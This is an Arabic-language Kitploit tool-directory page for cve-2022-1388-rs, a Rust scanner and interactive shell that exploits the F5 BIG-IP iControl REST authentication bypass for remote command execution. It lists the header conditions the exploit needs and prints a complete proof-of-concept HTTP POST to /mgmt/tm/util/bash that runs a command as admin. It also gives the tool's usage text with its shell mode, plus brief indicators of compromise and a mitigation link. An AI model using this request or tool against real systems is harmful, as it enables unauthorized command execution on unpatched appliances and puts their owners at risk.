Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-1388-rs — CVE-2022-1388 F5 BIG-IP iControl REST تجاوز المصادقة وتنفيذ الأوامر عن بُعد (RCE) مكتوب بلغة Rust | Kitploit
أدوات/GitHubGitHub/aancw/cve-2022-1388-rs
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubaancw/cve-2022-1388-rs

CVE-2022-1388-rs

CVE-2022-1388 F5 BIG-IP iControl REST تجاوز المصادقة وتنفيذ الأوامر عن بُعد (RCE) مكتوب بلغة Rust

عرض المستودع
25منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-1388-rs

ماسح ضوئي وقشرة تفاعلية لثغرة CVE-2022-1388 في F5 BIG-IP iControl REST لتجاوز المصادقة وتنفيذ الأوامر عن بُعد، مكتوب بلغة Rust

ملخص

للتلخيص، فيما يلي نظرة عامة على الشروط اللازمة لطلب استغلال هذه الثغرة:

  • يجب أن يتضمن ترويسة Connection القيمة X-F5-Auth-Token
  • يجب أن تكون ترويسة X-F5-Auth-Token موجودة
  • يجب أن تكون ترويسة Host هي localhost / 127.0.0.1 أو يجب أن تتضمن ترويسة Connection القيمة X-Forwarded-Host
  • يجب تعيين ترويسة Auth باسم مستخدم admin وأي كلمة مرور

PoC

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
    "command":"run",
    "utilCmdArgs":"-c id"
}

إعداد المختبر

  • يمكنك العثور على المختبر هنا

الاستخدام

root@kitploit:~
$ cve_2022_1308_rs -h

CVE-2022-1388 PoC 1.0
Petruknisme <[email protected]>
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in
Rust

USAGE:
    cve_2022_1388_rs [OPTIONS] --url <URL>

OPTIONS:
    -h, --help         Print help information
    -s, --shell        This mode for accessing payload with interactive shell
    -u, --url <URL>    F5 Big-IP target url
    -V, --version      Print version information

المتطلبات

  • Rust
  • Cargo

مؤشرات الاختراق (IoCs)

يمكن العثور على مؤشرات الاختراق في ملف السجل /var/log/audit. الأوامر غير المعروفة التي يتم تنفيذها عبر نقطة النهاية mgmt/tm/util/bash يجب أن تكون مدعاة للقلق.

التخفيف

قم بالتحديث إلى أحدث إصدار أو خفّف من المخاطر باتباع التعليمات الواردة في نشرة F5 الأمنية

  • https://support.f5.com/csp/article/K23605346

المراجع

  • https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
تنزيل الأداة